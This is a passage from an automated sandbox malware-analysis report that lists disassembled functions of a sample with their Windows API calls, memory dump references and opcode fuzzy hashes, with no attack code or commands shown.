                                                                                                                    • Instruction Fuzzy Hash: 2331E6719042496FCF249E78CC84EFA7BFDDB86314F1441E8E92997253EB309D458B50
                                                                                                                    Function 00BAD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction ID: fa5e0df39dc548969dc26baf7cdf7d24caede9b1b451aa77b9cec7d5c72b6669
                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction Fuzzy Hash: 59022C71E042199FDF18CFA9C8806ADB7F1EF49314F2582AAD81AE7780D730AD41CB90
                                                                                                                    Function 00B9AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE72C,?,?), ref: 00B9AF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    • Opcode ID: 8d12ef30c5f683243b15fa8239db83c1836332b3af729aba156527c7c1afe231
                                                                                                                    • Instruction ID: 527200c675805a4184fcd23fef6a3dec6c6dac0bc7cd3dda06bc88a3c7cbe3aa
                                                                                                                    • Opcode Fuzzy Hash: 8d12ef30c5f683243b15fa8239db83c1836332b3af729aba156527c7c1afe231
                                                                                                                    • Instruction Fuzzy Hash: 43019E7A110309ABD7109F65DC05FEA77FCEF08750F004022FA15A7260EBB099258BA5
                                                                                                                    Function 00B86C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00B86DDF,00000000,00000400), ref: 00B86C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B86C95
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 439739b6452eef5b6caa64bcfd77e0e5852688c906a5d7c2f884d0608b392f04
                                                                                                                    • Instruction ID: 19a8791e10145d586b057840e4884242aecaf283469e830de7f3aefcd1f21daa
                                                                                                                    • Opcode Fuzzy Hash: 439739b6452eef5b6caa64bcfd77e0e5852688c906a5d7c2f884d0608b392f04
                                                                                                                    • Instruction Fuzzy Hash: 71D05270248300BFEA002A218C06F2A2BD8EF40B42F18C004B280E90E0CAB09420EB28
                                                                                                                    Function 00BB19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BB19EF,?,?,00000008,?,?,00BB168F,00000000), ref: 00BB1C21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: 40b74e994e12c694712649c249e17895cd8f9f1877b5335a951bdfc7205fe740
                                                                                                                    • Instruction ID: 09ab6bec24aec98c73976256f63d0cc05f9d916b1772db37a219db986c76d18b
                                                                                                                    • Opcode Fuzzy Hash: 40b74e994e12c694712649c249e17895cd8f9f1877b5335a951bdfc7205fe740
                                                                                                                    • Instruction Fuzzy Hash: 88B13C31210609DFD725CF2CC49ABA57BE0FF45364F658A98E8A9CF2A1C375E991CB40
                                                                                                                    Function 00B9F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B9F66A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    • Opcode ID: 61b2cd6b8ccc03df0ebf8b444140c5df21be9652ef89d83afc247fef085a7571
                                                                                                                    • Instruction ID: 7cca823cb9787f215f0b0b4b9e985b265e9c31e2fca02f5e60c3d5aa985e3c98
                                                                                                                    • Opcode Fuzzy Hash: 61b2cd6b8ccc03df0ebf8b444140c5df21be9652ef89d83afc247fef085a7571
                                                                                                                    • Instruction Fuzzy Hash: 03515C71A0061ADFDF25CF99E9C16AAB7F4FB48364F24897AD411EB260D7749D00CB60
                                                                                                                    Function 00B8B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00B8B16B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: 8a69b4957336518902911695c7f1bd2aab824d60d1878cd832c640f20599454e
                                                                                                                    • Instruction ID: 846b3bb459612f8f5b8bd23380ef520c46f4fc3244c49926e6d1b9301c56f17b
                                                                                                                    • Opcode Fuzzy Hash: 8a69b4957336518902911695c7f1bd2aab824d60d1878cd832c640f20599454e
                                                                                                                    • Instruction Fuzzy Hash: F8F030B4E006088FDB18EF28EC96AD573F1FB49715F504695D515A33A0CBB0A981CF60
                                                                                                                    Function 00B840FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    • Opcode ID: a499efc3d322f5919e2cefa47e431ee68467a5e85945bfbf3dda5623babaa587
                                                                                                                    • Instruction ID: f2319d8ac0f128f334c40f2dc43e0e4b0084818936486447f6f52e8ec66e1ba9
                                                                                                                    • Opcode Fuzzy Hash: a499efc3d322f5919e2cefa47e431ee68467a5e85945bfbf3dda5623babaa587
                                                                                                                    • Instruction Fuzzy Hash: 46C14672A083818FC354CF29D88065AFBE1BFC8708F59892DE998D7311D774E948CB96
                                                                                                                    Function 00B9F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00B9F3A5), ref: 00B9F9DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 3bcd5a6ad2321df53f0f4544ba53b4df126a1297bd51f6d9886b6a93756f000f
                                                                                                                    • Instruction ID: 74bb0b3278b9cf2e59a76a55e5f0e027b7668c752aacdcc8669242214b7a6157
                                                                                                                    • Opcode Fuzzy Hash: 3bcd5a6ad2321df53f0f4544ba53b4df126a1297bd51f6d9886b6a93756f000f
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Function 00BAC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    • Opcode ID: ddfc8af8fd14cd7aa294fe0df50b1a7f1b3d279dabfafa83271438cc88b9d857
                                                                                                                    • Instruction ID: 474c3fffbf73956c11d05529d96dc32498d13be37dc1585a8c1e1cbb7782c195
                                                                                                                    • Opcode Fuzzy Hash: ddfc8af8fd14cd7aa294fe0df50b1a7f1b3d279dabfafa83271438cc88b9d857
                                                                                                                    • Instruction Fuzzy Hash: 48A02230202200CFC300CF38AF8C30C3BECAA00AC0308032AA008CB030EF30C2A0AB00
                                                                                                                    Function 00B962CA Relevance: .8, Instructions: 829COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: 459b24559c9e7aa0ea3e64a6550b4bf248f60b06c78e5aa0d1a23ac5237c17bd
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: 5562A2716047849FCF25CF28C4906B9BBE1AF95304F1989BEE8EA8B346D734E945CB11
                                                                                                                    Function 00B977EF Relevance: .8, Instructions: 817COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: 3f6b4307f0fbc007ec3e688571194d3b43f4898af203006550956d255040f153
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: 7D62D6716583458FCF15CF28C8805A9BBE1FF99304F1889BDE89A8B346DB30E945CB15
                                                                                                                    Function 00B8F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction ID: 2486b8a9e448b2fd639b72792197899831cd53ed893311bf99085be400d84dac
                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction Fuzzy Hash: 96524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                    Function 00B97153 Relevance: .5, Instructions: 536COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: da925728413ae14d6ce36a9d6481c341a222219436de235c78e0374eabebc38a
                                                                                                                    • Instruction ID: beeaad1b26258a98c9c0d65d27253ecf3a4c4235deea5560f5f4bf33b356ffe0
                                                                                                                    • Opcode Fuzzy Hash: da925728413ae14d6ce36a9d6481c341a222219436de235c78e0374eabebc38a
                                                                                                                    • Instruction Fuzzy Hash: 8A12D1B06687068FCB18CF28C4D0A79B7E0FB94304F14897EE996C7781EB34A995CB45
                                                                                                                    Function 00B8C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd697888f0ff0c89e5f6758e52d0b7654967e22546e9824259c40b99dfc7c1b8
                                                                                                                    • Instruction ID: 0237c387efbd0ae18a15f3c4d018ef6d0c16f073732ae3ea8edd1ed8974323bc
                                                                                                                    • Opcode Fuzzy Hash: fd697888f0ff0c89e5f6758e52d0b7654967e22546e9824259c40b99dfc7c1b8
                                                                                                                    • Instruction Fuzzy Hash: B1F1ACB16083018FC719EF28C48462ABFE1FFCA314F645AAEF48597265D730E945CB62
                                                                                                                    Function 00B96CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 329ac89ec4df59ef8e92c8691bed39ff002a96cb61f3e2df6480c7e9beca46c7
                                                                                                                    • Instruction ID: ae6bfc78335f4334f42596f86277621cff11697dff2c520c56929319c619d4e4
                                                                                                                    • Opcode Fuzzy Hash: 329ac89ec4df59ef8e92c8691bed39ff002a96cb61f3e2df6480c7e9beca46c7
                                                                                                                    • Instruction Fuzzy Hash: 17D181B1A483458FDF14DF28C88475BBBE1EF89308F1845BDE8899B242D774E905CB96
                                                                                                                    Function 00B8E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: edb626a2c553d05657fd421bd2057d28a73b96dff38c9fd26bd9b556afcd0859
                                                                                                                    • Instruction ID: c5438ad88cf23238b248244391d2b5330027c924b853aa99cdf5f5b10ad2bf10
